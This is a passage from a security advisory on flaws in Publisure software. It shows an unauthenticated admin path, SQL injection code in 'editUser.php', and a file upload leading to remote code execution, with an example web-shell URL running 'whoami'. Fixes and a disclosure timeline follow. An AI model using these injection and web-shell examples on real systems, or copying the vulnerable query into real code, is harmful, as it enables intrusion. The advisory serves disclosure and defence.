whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2) b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli "editUser.php" vulnerable code: $user = getUserDtails($_GET['id']); "userAccFunctions.php" vulnerable code example: function getUserDtails($id) { global $db; //The reseller_accounts table has been used to store department information since PDQit $Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id"; $R = $db->query($Q); return $R; } c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami) V. RECOMMENDATIONS a) Restrict access to administrative (and other) folder when non authenticated. b) Prepare SQL query before execution using PDO to escape injections. c) Check file type on file upload forms to prevent PHP code upload instead of templates. VI. TIMELINE July 23th, 2019: Vulnerability identification July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement August 13th, 2019: Contact to vendor to ask for fix - no reply September 04th, 2019: Vendor was informed 24h before public disclosure September 05th, 2019: public disclosure after 45 days VIII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this advisory. The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy